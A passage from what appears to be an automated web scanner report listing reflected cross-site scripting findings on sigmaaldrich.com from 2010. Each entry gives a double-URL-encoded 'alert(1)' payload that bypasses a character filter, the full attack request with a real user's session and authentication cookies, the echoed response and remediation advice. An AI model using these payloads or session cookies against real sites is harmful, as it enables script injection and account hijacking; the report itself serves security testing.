Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28939
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level136f5";alert(1)//844bb64fe02/career-opportunites.html","E404") ;
   </script>
...[SNIP]...

1.622. http://www.sigmaaldrich.com/site-level/career-opportunites.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/career-opportunites.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3767d%2522%253balert%25281%2529%252f%252f8befdd2d8d4 was submitted in the REST URL parameter 2. This input was echoed as 3767d";alert(1)//8befdd2d8d4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/3767d%2522%253balert%25281%2529%252f%252f8befdd2d8d4 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:01 GMT
Content-Length: 28915
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/3767d";alert(1)//8befdd2d8d4","E404") ;
   </script>
...[SNIP]...

1.623. http://www.sigmaaldrich.com/site-level/corporate.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bbe14%2522%253balert%25281%2529%252f%252f6b22372e485 was submitted in the REST URL parameter 1. This input was echoed as bbe14";alert(1)//6b22372e485 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-levelbbe14%2522%253balert%25281%2529%252f%252f6b22372e485/corporate.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28929
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-levelbbe14";alert(1)//6b22372e485/corporate.html","E404") ;
   </script>
...[SNIP]...

1.624. http://www.sigmaaldrich.com/site-level/corporate.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3cbce%2522%253balert%25281%2529%252f%252f662f81ab70a was submitted in the REST URL parameter 2. This input was echoed as 3cbce";alert(1)//662f81ab70a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/3cbce%2522%253balert%25281%2529%252f%252f662f81ab70a HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:02 GMT
Content-Length: 28915
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-level/3cbce";alert(1)//662f81ab70a","E404") ;
   </script>
...[SNIP]...

1.625. http://www.sigmaaldrich.com/site-level/corporate/business-development.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/business-development.html

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f768a%2522%253balert%25281%2529%252f%252fc41b2a12d0 was submitted in the REST URL parameter 1. This input was echoed as f768a";alert(1)//c41b2a12d0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-levelf768a%2522%253balert%25281%2529%252f%252fc41b2a12d0/corporate/business-development.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:00 GMT
Content-Length: 28949
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/site-levelf768a";alert(1)//c41b2a12d0/corporate/business-development.html","E404") ;
   </script>
...[SNIP]...

1.626. http://www.sigmaaldrich.com/site-level/corporate/business-development.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /site-level/corporate/business-development.html

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 405ea%2522%253balert%25281%2529%252f%252f37b0ed6cdf1 was submitted in the REST URL parameter 2. This input was echoed as 405ea";alert(1)//37b0ed6cdf1 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /site-level/corporate405ea%2522%253balert%25281%2529%252f%252f37b0ed6cdf1/business-development.html HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; 